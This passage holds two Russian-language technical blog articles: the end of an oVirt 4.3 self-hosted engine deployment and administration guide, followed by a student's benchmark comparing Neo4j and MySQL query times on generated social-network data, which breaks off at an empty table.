yum install qemu-kvm qemu-img virt-manager libvirt libvirt-python libvirt-client virt-install virt-viewer libguestfs libguestfs-tools dejavu-lgc-sans-fonts virt-top libvirt libvirt-python libvirt-client
systemctl enable libvirtd
systemctl restart libvirtd && systemctl status libvirtd
```
**Проверяем наличие поддержки 'md-clear':**
```
virsh domcapabilities kvm | grep require
```
После этого можно продолжать установку hosted engine.
**2)** В oVirt 4.3 наличие и использование файервола **firewalld** является обязательным требованием.
**Если во время развёртывания ВМ для hosted-engine получаем такую ошибку:**
```
[ ERROR ] fatal: [localhost]: FAILED! => {"changed": false, "msg": "firewalld is required to be enabled and active in order to correctly deploy hosted-engine. Please check, fix accordingly and re-deploy.\n"}
[ ERROR ] Failed to execute stage 'Closing up': Failed executing ansible-playbook
[https://bugzilla.redhat.com/show_bug.cgi?id=1608467
```
То необходимо выключить другой файервол (если он используется), и установить и запустить **firewalld**:
```
yum install firewalld
systemctl enable firewalld
systemctl start firewalld
firewall-cmd --state
firewall-cmd --get-default-zone
firewall-cmd --get-active-zones
firewall-cmd --get-zones
```
В дальнейшем, при установке агента ovirt на новом хосте для кластера, он настроит требуемые порты в **firewalld** автоматически.
**3)** Перезагрузка хоста с работающей на нём ВМ с hosted engine.
Как обычно, [ссылка 1](https://www.ovirt.org/documentation/self-hosted/chap-Maintenance_and_Upgrading_Resources.html) и [ссылка 2](https://www.ovirt.org/documentation/self-hosted/chap-Troubleshooting.html) на руководящие документы.
Всё управление hosted engine ВМ делается ТОЛЬКО с помощью команды **hosted-engine** на хосте, где она работает, про **virsh** надо забыть, также, как и про то, что к этой ВМ можно подключиться по SSH и выполнить на ней команду «**shutdown**».
**Процедура по выводу ВМ в режим обслуживания:**
```
hosted-engine --set-maintenance --mode=global
hosted-engine --vm-status
!! Cluster is in GLOBAL MAINTENANCE mode !!
--== Host host1.test.local (id: 1) status ==--
conf_on_shared_storage : True
Status up-to-date : True
Hostname : host1.test.local
Host ID : 1
Engine status : {"health": "good", "vm": "up", "detail": "Up"}
Score : 3400
stopped : False
Local maintenance : False
crc32 : dee1a774
local_conf_timestamp : 1821
Host timestamp : 1821
Extra metadata (valid at timestamp):
metadata_parse_version=1
metadata_feature_version=1
timestamp=1821 (Sat Nov 29 14:25:19 2019)
host-id=1
score=3400
vm_conf_refresh_time=1821 (Sat Nov 29 14:25:19 2019)
conf_on_shared_storage=True
maintenance=False
state=GlobalMaintenance
stopped=False
hosted-engine --vm-shutdown
```
Перезагружаем хост с hosted engine agent и делаем с ним что нам нужно.
После перезагрузки проверяем статус ВМ с hosted engine:
```
hosted-engine --vm-status
```
Если наша ВМ с hosted-engine не запускается и если мы видим похожие ошибки в логе сервиса:
**Ошибка в журнале сервиса:**
```
journalctl -u ovirt-ha-agent
...
Jun 29 14:34:44 host1 journal: ovirt-ha-agent ovirt_hosted_engine_ha.agent.hosted_engine.HostedEngine ERROR Failed to start necessary monitors
Jun 29 14:34:44 host1 journal: ovirt-ha-agent ovirt_hosted_engine_ha.agent.agent.Agent ERROR Traceback (most recent call last):#012 File "/usr/lib/python2.7/site-packages/ovirt_hosted_engine_ha/agent/agent.py", line 131, in _run_agent#012 return action(he)#012 File "/usr/lib/python2.7/site-packages/ovirt_hosted_engine_ha/agent/agent.py", line 55, in action_proper#012 return he.start_monitoring()#012 File "/usr/lib/python2.7/site-packages/ovirt_hosted_engine_ha/agent/hosted_engine.py", line 413, in start_monitoring#012 self._initialize_broker()#012 File "/usr/lib/python2.7/site-packages/ovirt_hosted_engine_ha/agent/hosted_engine.py", line 537, in _initialize_broker#012 m.get('options', {}))#012 File "/usr/lib/python2.7/site-packages/ovirt_hosted_engine_ha/lib/brokerlink.py", line 86, in start_monitor#012 ).format(t=type, o=options, e=e)#012RequestError: brokerlink - failed to start monitor via ovirt-ha-broker: [Errno 2] No such file or directory, [monitor: 'ping', options: {'addr': '172.20.32.32'}]
Jun 29 14:34:44 host1 journal: ovirt-ha-agent ovirt_hosted_engine_ha.agent.agent.Agent ERROR Trying to restart agent
```
То подключаем хранилище и перезапускаем агента:
```
hosted-engine --connect-storage
systemctl restart ovirt-ha-agent
systemctl status ovirt-ha-agent
hosted-engine --vm-start
hosted-engine --vm-status
```
После запуска ВМ с hosted-engine, выводим её из режима обслуживания:
**Процедура по выводу ВМ из режима обслуживания:**
```
hosted-engine --check-liveliness
hosted-engine --set-maintenance --mode=none
hosted-engine --vm-status
--== Host host1.test.local (id: 1) status ==--
conf_on_shared_storage : True
Status up-to-date : True
Hostname : host1.test.local
Host ID : 1
Engine status : {"health": "good", "vm": "up", "detail": "Up"}
Score : 3400
stopped : False
Local maintenance : False
crc32 : 6d1eb25f
local_conf_timestamp : 6222296
Host timestamp : 6222296
Extra metadata (valid at timestamp):
metadata_parse_version=1
metadata_feature_version=1
timestamp=6222296 (Fri Jan 17 11:40:43 2020)
host-id=1
score=3400
vm_conf_refresh_time=6222296 (Fri Jan 17 11:40:43 2020)
conf_on_shared_storage=True
maintenance=False
state=EngineUp
stopped=False
```
**4)** Удаление hosted engine и всего с ней связанного.
Иногда бывает необходимо правильно удалить ранее установленный hosted engine — [ссылка](https://www.ovirt.org/documentation/self-hosted/chap-Troubleshooting.html) на руководящий документ.
Просто выполняем команду на хосте:
```
/usr/sbin/ovirt-hosted-engine-cleanup
```
Далее удаляем ненужные пакеты, забэкапив перед этим какие-то конфиги, если это необходимо:
```
yum autoremove ovirt* qemu* virt* libvirt* libguestfs
```
#### Создание нового датацентра
Справочная документация — oVirt Administration Guide. [Chapter 4: Data Centers](https://www.ovirt.org/documentation/admin-guide/chap-Data_Centers.html)
Сначала определим, что такое **датацентр** (цитирую из справки) — это логическая сущность, которая определяет набор ресурсов, используемых в специфическом окружении.
Датацентр — это своего рода контейнер, состоящий из:
* логических ресурсов в виде кластеров и хостов
* сетевых ресурсов кластера в виде логических сетей и физических адаптеров на хостах,
* ресурсов хранения (для дисков ВМ, шаблонов, образов) в виде областей хранения (Storage Domains).
Датацентр может включать в себя несколько кластеров, состоящих из нескольких хостов с виртуальными машинами, работающими на них, у него также может быть несколько областей хранения, ассоциированных с ним.
Датацентров может быть несколько, они работают независимо друг от друга. В ovirt имеется разделение полномочий по ролям, и можно настроить разрешения персонально, как на уровне датацентра, так и на его отдельные логические элементы.
Датацентр, или датацентры если их несколько, управляются из единой административной консоли или портала.
Чтобы создать датацентр, заходим в административный портал и создаём новый датацентр:
**Compute** >> **Data Centers** >> **New**
Так как у нас используется общее хранилище на СХД, то тип хранилища (Storage Type) должен быть Shared:
**Скриншот с мастером создания датацентра**
При установке виртуальной машины с hosted-engine, по умолчанию создаётся датацентр – **Datacenter1**, и далее при необходимости у него можно поменять тип хранилища (Storage Type) на другой.
Создание датацентра — это несложная задача, без каких-то хитрых нюансов, и все дополнительные действия с ним описаны в документации. Единственно замечу, что одиночные хосты имеющие только локальное хранилище (диск) для ВМ, в датацентр c Storage Type — Shared попасть не смогут (нельзя будет их туда добавить), и для них нужно создавать отдельный датацентр – т.е. каждому отдельному хосту с локальным хранилищем, нужен свой отдельный датацентр.
#### Создание нового кластера
Ссылка на документацию — oVirt Administration Guide. [Chapter 5: Clusters](https://www.ovirt.org/documentation/admin-guide/chap-Clusters.html)
Без излишних подробностей, **кластер** – это логическая группировка хостов, имеющих общую область хранения (в виде общих дисков на СХД, как в нашем случае). Также желательно, чтобы хосты в кластере были идентичны по железу, и имели бы одинаковый тип процессора (Intel или AMD). Лучше всего конечно, чтобы сервера в кластере были полностью одинаковыми.
Кластер входит в состав датацентра (c определённым типом хранилища — *Local* или *Shared*), а все хосты в обязательном порядке должны принадлежать какому-либо кластеру, в зависимости от того, есть ли у них общее хранилище или нет.
При установке виртуальной машины с hosted-engine на хост, по умолчанию создаётся датацентр — **Datacenter1**, вместе с кластером – **Cluster1**, и в дальнейшем можно настроить его параметры, включить дополнительные опции, добавить в него хосты и т.п.
Как обычно, для получения подробностей о всех настройках кластера, желательно обратиться к официальной документации. Из каких-то особенностей настройки кластера, добавлю лишь, что при его создании достаточно настроить только основные параметры на вкладке ***General***.
Отмечу наиболее важные параметры:
* *Processor type* — выбирается, исходя из того, какие процессоры установлены на хостах кластера, от какого они производителя, и какой процессор на хостах самый старый, чтобы в зависимости от этого, использовать все доступные процессорные инструкции в кластере.
* *Switch type* – у нас в кластере используется только Linux bridge, поэтому его и выбираем.
* *Firewall type* – тут всё понятно, это firewalld, который должен быть включен и настроен на хостах.
**Скриншот с параметрами кластера**
#### Установка дополнительных хостов в Self-Hosted окружении
[Ссылка](https://www.ovirt.org/documentation/self-hosted/chap-Installing_Additional_Hosts_to_a_Self-Hosted_Environment.html) на документацию.
Дополнительные хосты для Self-Hosted окружения, добавляются так же, как и обычный хост, с выполнением дополнительного пункта по развертыванию ВМ с hosted engine — ***Choose hosted engine deployment action*** >> ***Deploy***. Так как дополнительному хосту тоже должен быть презентован LUN для ВМ с hosted engine, то это значит, что этот хост можно при необходимости использовать для размещения на нём ВМ с hosted engine.
В целях отказоустойчивости весьма рекомендуется, чтобы было минимум два хоста, на которых может быть размещена ВМ с hosted engine.
На дополнительном хосте отключаем iptables (если включен), включаем firewalld
```
systemctl stop iptables
systemctl disable iptables
systemctl enable firewalld
systemctl start firewalld
```
Устанавливаем требуемую версию KVM (по необходимости):
```
yum-config-manager --disable mirror.centos.org_centos-7_7_virt_x86_64_libvirt-latest_
yum install centos-release-qemu-ev
yum update
yum install qemu-kvm qemu-img virt-manager libvirt libvirt-python libvirt-client virt-install virt-viewer libguestfs libguestfs-tools dejavu-lgc-sans-fonts virt-top libvirt libvirt-python libvirt-client
systemctl enable libvirtd
systemctl restart libvirtd && systemctl status libvirtd
virsh domcapabilities kvm | grep md-clear
```
Устанавливаем нужные репозитории и установщик hosted engine:
```
yum -y install http://resources.ovirt.org/pub/yum-repo/ovirt-release43.rpm
yum -y install epel-release
yum update
yum install screen ovirt-hosted-engine-setup
```
Далее переходим в консоль ***Open Virtualization Manager***, добавляем новый хост, и делаем всё пошагово, как написано в [документации](https://www.ovirt.org/documentation/self-hosted/chap-Installing_Additional_Hosts_to_a_Self-Hosted_Environment.html).
В результате, после добавления дополнительного хоста, мы должны получить примерно картину в административной консоли, как на скриншоте.
**Скриншот административного портала - хосты**
Хост, на котором ВМ с hosted-engine в данный момент активна, имеет золотую корону и надпись «*Running the Hosted Engine VM*», хост, на котором эта ВМ может быть запущена при необходимости – надпись «*Can run the Hosted Engine VM*».
В случае сбоя хоста на котором «*Running the Hosted Engine VM*», она автоматически перезапустится на втором хосте. Также эту ВМ можно мигрировать с активного хоста на резервный, для его обслуживания.
Настройка Power Management / fencing на хостах oVirt
Ссылки на документацию:
* Red Hat Virtualization 4.3 –> Technical Reference -> [Chapter 4. Power Management](https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.3/html/technical_reference/chap-power_management)
* oVirt Administration Guide -> [Chapter 7: Hosts](https://www.ovirt.org/documentation/admin-guide/chap-Hosts.html)
Хотя может показаться, что добавление и настройка хоста выполнены, но это не совсем так.
Для нормальной работы хостов, и выявления/устранения сбоев с кем-либо из них, необходима настройка Power Management / fencing.
**Fencing**, или огораживание – это процесс временного исключения неисправного или сбойного хоста из кластера, в процессе которого перезапускаются или сервисы oVirt на нём, или сам хост.
Все подробности по определениям и параметрам Power Management / fencing даны, как обычно в документации, я лишь приведу пример, как настроить этот важный параметр, в применении к серверам Dell R640 с iDRAC 9.
1. Заходим в административный портал, кликаем **Compute** >> **Hosts** выбираем хост.
2. Кликаем **Edit**.
3. Кликаем вкладку **Power Management**.
4. Отмечаем флажок напротив опции **Enable Power Management**.
5. Отмечаем флажок напротив опции *Kdump integration*, чтобы хост не перешёл в режим огораживания (fencing), во время записи аварийного дампа ядра.
**Примечание.**После включения Kdump integration на уже работающем хосте, он должен быть переустановлен в соответствии с процедурой в oVirt Administration Guide -> [Chapter 7: Hosts](https://www.ovirt.org/documentation/admin-guide/chap-Hosts.html) -> Reinstalling Hosts.
1. Опционально можно отметить флажок *Disable policy control of power management*, если мы не хотим, чтобы управления питанием хоста, контролировалось бы политикой планирования (Scheduling Policy) кластера.
2. Кликаем кнопку (*+*), чтобы добавить новое устройство управления питанием, откроется окно редактирования свойств агента.
Для iDRAC9, заполняем поля:
* *Address* – адрес iDRAC9
* *User Name / Password* – соответственно логин и пароль для входа в iDRAC9
* *Type* — drac5
* отметить *Secure*
* добавить следующие опции: *cmd\_prompt=>,login\_timeout=30*
**Скриншот с параметрами «Power Management» в свойствах хоста**
#### Создание области хранения или Storage Domains
Ссылка на документацию — oVirt Administration Guide, [Chapter 8: Storage](https://www.ovirt.org/documentation/admin-guide/chap-Storage.html).
**Storage Domain**, или область хранения – это централизованное место для хранения дисков виртуальных машин, установочных образов, шаблонов и снэпшотов.
Области хранения могут подключаться к датацентру, используя различные протоколы, кластерные и сетевые файловые системы.
У oVirt имеется три типа области хранения:
* **Data Domain** – для хранения всех данных, связанных с виртуальными машинами (диски, шаблоны). Data Domain не может разделяться между разными датацентрами.
* **ISO Domain** (устаревший тип области хранения) – для хранения установочных образов ОС. ISO Domain может разделяться между разными датацентрами.
* **Export Domain** (устаревший тип области хранения) – для временного хранения образов, перемещаемых между датацентрами.
В нашем частном случае область хранения с типом Data Domain, использует Fibre Channel Protocol (FCP), для подключения к LUN'ам на СХД.
С точки зрения oVirt, при использовании СХД (FC или iSCSI) каждый виртуальный диск, снэпшот или шаблон — это логический диск.
Блочные устройства собираются в одно целое (на хостах кластера) с помощью Volume Group и затем разделяются с помощью LVM на логические тома, используемые как виртуальные диски для ВМ.
Все эти группы и множество томов LVM, можно увидеть на хосте кластера, с помощью команд **vgs** и **lvs**. Естественно, что все действия с такими дисками нужно делать только из консоли oVirt, кроме особых случаев.
Виртуальные диски для ВМ могут быть двух типов — QCOW2 или RAW. Диски могут быть "*тонкими*" или "*толстыми*". Снэпшоты всегда создаются как "*тонкие*".
Способ управления Storage domains, или областями хранения, доступ к которым осуществляется через FC, довольно логичен — для каждого виртуального диска ВМ существует отдельный логический том, который доступен для записи только одному хосту. В случае подключений через FC, oVirt использует что-то наподобие кластерного LVM.
Виртуальные машины, расположенные на одной области хранения, можно мигрировать между хостами, принадлежащими одному и тому же кластеру.
Как видим из описания, кластер в oVirt, как и кластер в VMware vSphere или в Hyper-V, по сути обозначают одно и тоже – это логическая группировка хостов, желательно одинаковых по составу «железа», и имеющих общее хранилище для дисков виртуальных машин.
Перейдём непосредственно к созданию области хранения для данных (дисков ВМ), так как без неё датацентр не будет проинициализирован.
Напомню, что все презентованные хостам кластера LUN'ы на СХД, должны быть на них видны с помощью команды «**multipath -ll**».
Согласно [документации](https://www.ovirt.org/documentation/admin-guide/chap-Storage.html), идём в портале заходим в ***Storage*** >> ***Domains*** -> ***New Domain*** и выполняем инструкции из раздела "Adding FCP Storage".
После запуска мастера, заполняем требуемые поля:
* *Name* — задаём имя кластера
* *Domain Function* — Data
* *Storage Type* — Fibre Channel
* *Host to Use* — выбираем хост, на котором доступен требуемый нам LUN
В списке LUN'ов отмечаем нужный нам, кликаем *Add* и затем *ОК*. При необходимости можно скорректировать дополнительные параметры области хранения, кликнув на *Advanced Parameters*.
**Скриншот мастера по добавлению «Storage domain»**
По результатам работы мастера, мы должны получить новую область хранения, а наш датацентр перейти в статус **UP**, или инициализирован:
**Скриншоты датацентра и областей хранения в нём:**

#### Создание и настройка сетей для виртуальных машин
Ссылка на документацию — oVirt Administration Guide, [Chapter 6: Logical Networks](https://www.ovirt.org/documentation/admin-guide/chap-Logical_Networks.html)
Networks, или сети – служат для группировки логических сетей, используемых в виртуальной инфраструктуре oVirt.
Для взаимодействия сетевого адаптера на виртуальной машине, с физическим адаптером на хосте, используются логические интерфейсы типа Linux bridge.
Для группировки и разделения трафика между сетями, на коммутаторах настроены VLAN'ы.
При создании логической сети для виртуальных машин в oVirt, ей надо обязательно назначить идентификатор, соответствующий номеру VLAN на коммутаторе, чтобы ВМ могли бы взаимодействовать друг с другом, даже если они работают на разных узлах кластера.
Предварительные настройки сетевых адаптеров на хостах для подключения виртуальных машин должны были быть выполнены в [предыдущей статье](https://habr.com/ru/company/lenvendo/blog/483980/) – настроен логический интерфейс **bond1**, далее все сетевые настройки должны производиться только через административный портал oVirt.
После создания ВМ с hosted-engine, помимо автоматического создания датацентра и кластера, также автоматически создалась и логическая сеть для управления нашим кластером – **ovritmgmt**, к которой была подключена эта ВМ.
При необходимости можно посмотреть настройки логической сети **ovritmgmt** и скорректировать их, но надо быть осторожным, чтобы не потерять управление инфраструктурой oVirt.
**Настройки логической сети ovritmgmt**
Для создания новой логической сети для обычных ВМ, в административном портале переходим в ***Network*** >> ***Networks*** >> ***New***, и на вкладке ***General*** добавляем сеть с нужным идентификатором VLAN, а также ставим флажок напротив «*VM Network*», это означает что её можно использовать для назначения на ВМ.
**Скриншот новой логической сети VLAN32**
На вкладке ***Cluster***, прикрепляем эту сеть к нашему кластеру **Cluster1**.
После этого переходим в ***Compute*** >> ***Hosts***, по очереди заходим в каждый хост, на вкладку ***Network interfaces***, и запускаем мастер *Setup host networks*, для привязки к хостам новой логической сети.
**Скриншот мастера «Setup host networks»**
Агент oVirt автоматически сделает все необходимые сетевые настройки на хосте – создаст VLAN и BRIDGE.
**Пример конфигурационных файлов для новых сетей на хосте:**
```
cat ifcfg-bond1
# Generated by VDSM version 4.30.17.1
DEVICE=bond1
BONDING_OPTS='mode=1 miimon=100'
MACADDR=00:50:56:82:57:52
ONBOOT=yes
MTU=1500
DEFROUTE=no
NM_CONTROLLED=no
IPV6INIT=no
cat ifcfg-bond1.432
# Generated by VDSM version 4.30.17.1
DEVICE=bond1.432
VLAN=yes
BRIDGE=ovirtvm-vlan432
ONBOOT=yes
MTU=1500
DEFROUTE=no
NM_CONTROLLED=no
IPV6INIT=no
cat ifcfg-ovirtvm-vlan432
# Generated by VDSM version 4.30.17.1
DEVICE=ovirtvm-vlan432
TYPE=Bridge
DELAY=0
STP=off
ONBOOT=yes
MTU=1500
DEFROUTE=no
NM_CONTROLLED=no
IPV6INIT=no
```
Ещё раз напомню, что на хосте кластера НЕ НУЖНО заранее создавать руками сетевые интерфейсы **ifcfg-bond1.432** и **ifcfg-ovirtvm-vlan432**.
После добавления логической сети и проверки соединения между хостом и ВМ c hosted engine, её можно использовать в виртуальной машине.
#### Создание установочного образа для развёртывания виртуальной машины
Ссылка на документацию — oVirt Administration Guide, [Chapter 8: Storage](https://www.ovirt.org/documentation/admin-guide/chap-Storage.html), раздел Uploading Images to a Data Storage Domain.
Без установочного образа ОС, не удастся установить виртуальную машину, хотя это конечно и не является проблемой, если в сети установлен, например, [Cobbler](https://cobbler.github.io/) с заранее созданными образами.
В нашем случае такой возможности нет, поэтому придётся самостоятельно этот образ импортировать в oVirt. Ранее, для этого требовалось создавать ISO Domain, но в новой версии oVirt он был признан устаревшим, и поэтому теперь можно загружать образы прямо в Storage domain из административного портала.
В административном портале идём в **Storage** >> **Disks** >> **Upload** >> **Start**
Добавляем наш образ ОС в виде ISO файла, в форме заполняем все поля, и кликаем кнопку "*Test connection*".
**Скриншот мастера добавления установочного образа**
**Если получаем ошибку такого вида:** `Unable to upload image to disk d6d8fd10-c1e0-4f2d-af15-90f8e636dadc due to a network error. Ensure that ovirt-imageio-proxy service is installed and configured and that ovirt-engine's CA certificate is registered as a trusted CA in the browser. The certificate can be fetched from https://ovirt.test.local/ovirt-engine/services/pki-resource?resource=ca-certificate&format=X509-PEM-CA``
То необходимо добавить сертификат oVirt в «**Доверенные корневые ЦС**» (Trusted Root CA) на управляющей станции администратора, откуда пытаемся загрузить образ.
После добавления сертификата в Trusted Root CA, опять кликаем "*Test connection*", должны получить:
```
Connection to ovirt-imageio-proxy was successful.
```
Выполнив действие по добавлению сертификата, можно попробовать опять загрузить образ ISO в Storage Domain.
В принципе, можно сделать отдельный Storage Domain с типом Data, для хранения образов и шаблонов отдельно от дисков ВМ, или даже хранить их в Storage Domain для hosted engine, но это уже на усмотрение администратора.
**Скриншот с образами ISO в Storage Domain для hosted engine**
#### Создание виртуальной машины
Ссылка на документацию:
oVirt Virtual Machine Management Guide –> [Chapter 2: Installing Linux Virtual Machines
Console Clients Resources](https://www.ovirt.org/documentation/vmm-guide/chap-Installing_Linux_Virtual_Machines.html)
После загрузки в oVirt установочного образа с ОС, можно переходить непосредственно к созданию виртуальной машины. Много было работы проделано, но мы уже находимся на завершающем этапе, ради чего всё это и затевалось – получение отказоустойчивой инфраструктуры для хостинга высокодоступных виртуальных машин. И причём всё это абсолютно бесплатно – ни одной копейки на приобретение каких-либо лицензий на ПО, не было потрачено.
Для создания виртуальной машины с CentOS 7, должен быть загружен установочный образ с ОС.
Заходим в административный портал, идём в **Compute** >> **Virtual Machines**, и запускаем мастер создания ВМ. Заполняем все параметры и поля, и кликаем *ОК*. Всё очень просто, если следовать документации.
В качестве примера, приведу основные и дополнительные настройки высокодоступной ВМ, с созданным диском, подключенную к сети, и с загрузкой с установочного образа:
**Скриншоты с настройками высокодоступной ВМ**




После окончания работ с мастером, закрываем его, запускаем новую ВМ и устанавливаем на неё ОС.
Для этого заходим в консоль этой ВМ через административный портал:
**Скриншот настроек административного портала для подключения к консоли ВМ**
Чтобы подключиться к консоли ВМ, предварительно надо настроить консоль в свойствах виртуальной машины.
**Скриншот настроек ВМ, вкладка «Console»**
Для подключения к консоли ВМ можно использовать, например, [Virtual Machine Viewer](https://virt-manager.org/).
Чтобы подключиться к консоли ВМ прямо в окне браузера, настройки подключения через консоль должны быть такими:

После установки ОС на ВМ, желательно установить oVirt guest agent:
```
yum -y install epel-release
yum install -y ovirt-guest-agent-common
systemctl enable ovirt-guest-agent.service && systemctl restart ovirt-guest-agent.service
systemctl status ovirt-guest-agent.service
```
Таким образом, в результате наших действий, созданная ВМ будет высокодоступной, т.е. в случае сбоя узла кластера, на котором она запущена, oVirt её автоматически перезапустит на втором узле. Также эту ВМ можно мигрировать между хостами кластера для их обслуживания, или других целей.
#### Заключение
Надеюсь, что этой статьёй удалось донести, что oVirt – вполне нормальный инструмент по управлению виртуальной инфраструктурой, который развернуть не так и сложно — главное соблюдать определённые правила и требования, описанные как в статье, так и в документации.
Из-за большого объёма статьи в неё не удалось поместить многие вещи, типа пошагового выполнения различных мастеров со всеми подробными пояснениями и скриншотами, длинные выводы каких-то команд, и т.п. На самом деле для этого потребовалось бы написать целую книгу, что не имеет особого смысла, из-за постоянно появляющихся новых версий ПО с нововведениями и изменениями. Самое главное – это понять принцип, как оно всё вместе работает, и получить общий алгоритм действий по созданию отказоустойчивой платформы по управлению виртуальными машинами.
Хотя виртуальную инфраструктуру мы создали, но теперь надо научить её взаимодействовать как между своими отдельными элементами: хостами, виртуальными машинами, внутренними сетями, так и с внешним миром.
Этот процесс является одной из основных задач системного или сетевого администратора, которая будет раскрыта в следующей статье — про использование виртуальных маршрутизаторов VyOS в отказоустойчивой инфраструктуре нашего предприятия (как вы догадались, они будут работать в виде виртуальных машин на нашем кластере oVirt). | https://habr.com/ru/post/485208/ | null | ru | null |
# Neo4j VS MySQL
#### Предисловие
Будучи студентом третьего курса, я выбрал тему для курсовой роботы: «Графовые базы данных на примере Neo4j». Так как до того времени я изучал и использовал исключительно реляционные БД, мне было интересно, зачем вообще графовая БД и когда ее способности лучше применять? После просмотра множества сайтов в интернете я обнаружил только теорию и не больше. Так как теория не всегда убедительная и хотелось бы увидеть какую либо статистику, у меня разыгралось любопытство и я решил, что в своей курсовой я этим займусь, а в качестве противника Neo4j я выбрал MySQL.
Итак, кто же выиграет это противостояние?
#### Коротко о Neo4j и графовых БД
Neo4j — open-source графовая база данных, история которой началась по инвестициям компании «Neo Technology» в 2003 году. С 2007 года стала публично доступной. В Neo4j присутствуют все характеристики баз данных, включая соблюдение ACID, поддержание разбиение на кластеры и восстановления после сбоя в системе. Сегодня является лидером среди графов баз данных.
ACID (Atomicity, Consistency, Isolation, Durability) — набор свойств, которые гарантируют надежную работу транзакций.
Компоненты графовой базы данных — узлы и ребра. Они могут быть дополнены собственным набором полей. Модель такой БД схематично изображена на рисунке.

#### Сохранение данных в Neo4j
Файл nodestore.db содержит определенный размер записей, содержащих информацию о Ноды:
1. Метка, которая показывает, запись активна;
2. Указатель на первое отношение, которое содержит данная нода;
3. Указатель на первую свойство, которое содержит данная нода.
Нода не содержит собственного идентификатора. Так как каждая запись в nodestore.db занимает одинаковое количество места, можно рассчитать указатель на ноду.
Файл relationshipstore.db также содержит записи одинакового размера, которые описывают отношения, но они состоят из следующих элементов:
1. Метка, которая показывает, запись активна;
2. Указатель на ноду, которая содержит это отношение;
3. Указатель на ноду, к которой это отношение направлено;
4. Вид отношения;
5. Указатель на отношение, которое стоит впереди (в пределах данной ноды);
6. Указатель на отношение, которое стоит сзади (в пределах данной ноды);
7. Указатель на отношение, которое стоит впереди (в пределах Ноды, в которой это отношение направлено);
8. Указатель на отношение, которое стоит сзади (в пределах Ноды, в которой это отношение направлено);
9. Указатель на первое свойство данного отношения.
#### Наполнение данными
Для того, чтобы сравнить на эффективность, надо заполнить базы данных одинаковым контентом. Стоить заметить, что эти данные должны иметь большой объем. На маленьких объемах разницу мы не увидим. Поэтому я поставил себе за цель сгенерировать для реляционной модели не меньше, чем 300 мегабайт.
Мною была выбрана предметная область — социальная сеть. Я построил ER диаграмму, на основе которой создал реляционную и графовую модели.

После этого я заполнил MySQL данными, создав класс генерации этих данных и методы, которые вносили новые данные в БД.
Количество данных, которые были внесены в MySQL:
addUsers(100 000); — количество пользователей.
addGroups(200 000); — количество групп.
addPhotos(300 000); — количество фотографий.
addAudio(250 000); — количество аудиозаписей.
addFriendships(1 000 000); — количество друзей.
addMessages(4 000 000); — количество сообщений.
addUserAudio(350 000); — количество аудиозаписей.
addUserGroups(400 000); — количество групп пользователей.
addUserPhoto(400 000); — количество фотографий пользователей.
Потом я конвертировал эти данные в Neo4j. Стоит заметить, что заполнение БД у меня отняло очень много времени. Если вы решите провести что-то подобное самостоятельно, готовьтесь к тому, что либо потратите много времени, либо не используйте полей с текстом (думаю, это заняло много времени в моем случае). После этого я сравнил место, которое занимает информация в Neo4j и MySQL. Был небольшой шок, для реляционной БД надо было 351.5 МБ, а для графовой – 3.45 ГБ. Теперь приступим к экспериментам.
#### Эксперимент 1
Описание эксперимента: измерение времени поиска пользователя по его идентификатору.
В этом эксперименте я искал пользователей за их идентификатором определенное количество раз. Для этого я написал методы, код которых представлено ниже.
```
public static void main(String[] args){
// Database connection initialisation
init();
int [] counts = {10, 100, 1000, 5000, 10000, 30000, 60000, 90000, 120000};
for(int i = 0; i < counts.length; i++){
findUserByIDTest(counts[i]);
}
}
static void findUserByIDTest(int count){
System.out.println("__________________________________");
System.out.println("STATISTIC FOR COUNT: " + count);
{
Random r = new Random(count);
long time = - System.currentTimeMillis();
for (int i = 0; i < count; i++) {
int id = r.nextInt(100000);
User u = MySQLDAO.getUserByID(id);
}
time += System.currentTimeMillis();
System.out.println("Time for MySQL:" + time);
}
{
Random r = new Random(count);
long time = - System.currentTimeMillis();
for (int i = 0; i < count; i++) {
int id = r.nextInt(100000);
User u = Neo4jDAO.getUserByID(id);;
}
time += System.currentTimeMillis();
System.out.println("Time for Neo4j:" + time);
}
System.out.println("__________________________________");
}
```
После выполнения программного кода я составил таблицу и нарисовал построил диаграмму к ней. Результаты меня порадовали. Neo4j замечательно справилась.
| |
| --- |
| User count = 100000
|
| Number of queries
| Time for MySQL, ms
| Time for Neo4j, ms
|
| 10
| 4
| 9
|
| 100
| 34
| 76
|
| 1000
| 286
| 510
|
| 5000
| 1034
| 1103
|
| 10000
| 1340
| 1187
|
| 30000
| 3390
| 1384
|
| 60000
| 6876
| 2102
|
| 90000
| 10537
| 3175
|
| 120000
| 14033
| 3858
|

#### Эксперимент 2
Описание эксперимента: измерение времени нахождения друзей пользователя с изменением величины интервала вхождения идентификаторов для поиска.
В этом эксперименте я выбирал диапазон допустимых значений идентификатора и искал друзей пользователя с этим идентификатором. Потом я менял этот диапазон и проводил эксперимент заново. После чего у меня вышла соответствующая таблица с данными, по которой я построил графики зависимости.

При любом раскладе, время графовой базы для поиска на больших данных было меньше, чем то, которое надо реляционной.
#### Эксперимент 3
Описание эксперимента: измерение времени нахождения общего количества фотографий у пользователей, которые администрируют хотя бы одну группу, в зависимости от диапазона значений идентификаторов пользователя.
Этот эксперимент очень похож на предыдущий, но является более сложным. Если значения времени в предыдущих экспериментах при повторениях отличались слабо, то в этом скачки куда сильнее. Поэтому я провел этот эксперимент три раза и составил соответствующую таблицу.
| |
| --- |
| User count = 100000, Photo count = 300000, User photo count = 400000
|
| | experiment 1
| experiment 2
| experiment 3
|
| id range <
| Time for MySQL, ms
| Time for Neo4j ,ms
| Time for MySQL, ms
| Time for Neo4j, ms
| Time for MySQL, ms
| Time for Neo4j, ms
|
| 10
| 299
| 11339
| 164
| 92594
| 456
| 56575
|
| 100
| 10652
| 2748
| 674
| 2400
| 663
| 2826
|
| 1000
| 7243
| 4931
| 5433
| 2481
| 5649
| 1942
|
| 5000
| 22538
| 5521
| 23747
| 2408
| 23522
| 3514
|
| 10000
| 47755
| 5627
| 44917
| 2650
| 44992
| 1844
|
| 30000
| 137572
| 8161
| 33856
| 3108
| 136592
| 3707
|
| 60000
| 64002
| 13577
| 300814
| 5004
| 280672
| 6029
|
| 90000
| 482329
| 13475
| 438875
| 5102
| 429304
| 5631
|



После обсуждений на хабре, я попробовал изменил подход к условиям эксперимента: поправил запрос, на более простой, перед каждым экспериментом подымал заново MySQL и додерживался условия, что не должны работать MySQL и Neo4j одновременно. Вышло следующее: график MySQL стал более стабильным, а графовая бд начала очень сильно проигрывать реляционной на небольших объёмах данных.
| | |
| --- | --- |
| | experiment 1 |
